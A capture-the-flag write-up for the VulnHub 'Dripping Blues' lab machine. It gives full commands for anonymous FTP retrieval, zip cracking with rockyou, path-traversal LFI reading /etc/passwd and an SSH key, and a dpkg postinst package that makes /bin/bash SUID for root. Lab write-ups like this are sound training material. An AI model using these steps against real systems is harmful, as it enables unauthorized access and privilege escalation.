CTF WRITEUP VULNHUB EASY

Dripping Blues — VulnHub Easy

person

Written By

Th0mas_sh316y

Difficulty

Platform

VulnHub

Target IP

192.168.1.25

Dripping Blues Machine
Machine: Dripping Blues · Easy · Linux · VulnHub

Dripping Blues is a multi-stage box that hits all the classic enumeration touchpoints — anonymous FTP, password-protected zip, hidden URL parameter, SSH, and a sudo binary in GTFOBins. None of the steps are individually hard but the chain teaches you to keep enumerating after each foothold. About 90 minutes start to finish.

01_Reconnaissance

FTP 21 + SSH 22 + HTTP 80. FTP allows anonymous login — there's a zip file sitting in the share.

terminal / nmap + ftp
$ nmap -sV -p- 192.168.1.25
21/tcp open  ftp     vsftpd (Anonymous: yes)
22/tcp open  ssh
80/tcp open  http

$ ftp anonymous@192.168.1.25
ftp> ls
respectmydrip.zip
ftp> get respectmydrip.zip

02_fcrackzip_Dictionary_Attack

The zip is password-protected. fcrackzip with rockyou cracks it in seconds. Inside there's a hint pointing at a hidden URL parameter on the web server.

terminal / fcrackzip
$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt respectmydrip.zip
PASSWORD FOUND: pw == [REDACTED]

$ unzip respectmydrip.zip
> respectmydrip.txt — hint about a "drip" parameter

03_LFI_via_drip_Parameter

The web server has an index.php that accepts a drip parameter and includes the file directly. LFI to /etc/passwd reveals user accounts. Read the user's home directory for an SSH key or credentials.

terminal / LFI + ssh
$ curl "http://192.168.1.25/index.php?drip=../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
mysql:x:107:113:...
[user]:x:1000:1000

# Continue LFI to /home/[user]/.ssh/id_rsa or stash credentials
$ ssh [user]@192.168.1.25 -i id_rsa

04_PrivEsc_via_dpkg_sudo

sudo -l shows passwordless dpkg. GTFOBins covers this — install a malicious .deb package or use the --listfiles shell escape, depending on the version.

terminal / dpkg GTFOBins
$ sudo -l
(root) NOPASSWD: /usr/bin/dpkg

# GTFOBins — build malicious .deb with postinst
$ TF=$(mktemp -d)
$ mkdir -p "$TF/DEBIAN" "$TF/usr/local/bin"
$ echo "#!/bin/bash" > "$TF/DEBIAN/postinst"
$ echo "chmod +s /bin/bash" >> "$TF/DEBIAN/postinst"
$ chmod +x "$TF/DEBIAN/postinst"
$ printf "Package: pwn\nVersion: 1.0\nArchitecture: all\nMaintainer: x\nDescription: x" > "$TF/DEBIAN/control"
$ dpkg-deb -b "$TF" /tmp/pwn.deb
$ sudo dpkg -i /tmp/pwn.deb

$ /bin/bash -p
# id
uid=1000 euid=0(root)

05_Attack_Chain_Summary

  1. 01 nmap → FTP/SSH/HTTP → anonymous FTP zip download
  2. 02 fcrackzip + rockyou → zip password → contents hint
  3. 03 index.php?drip=... → LFI → /etc/passwd + SSH key
  4. 04 SSH login → sudo -l shows dpkg NOPASSWD
  5. 05 dpkg-deb postinst payload → SUID bash → root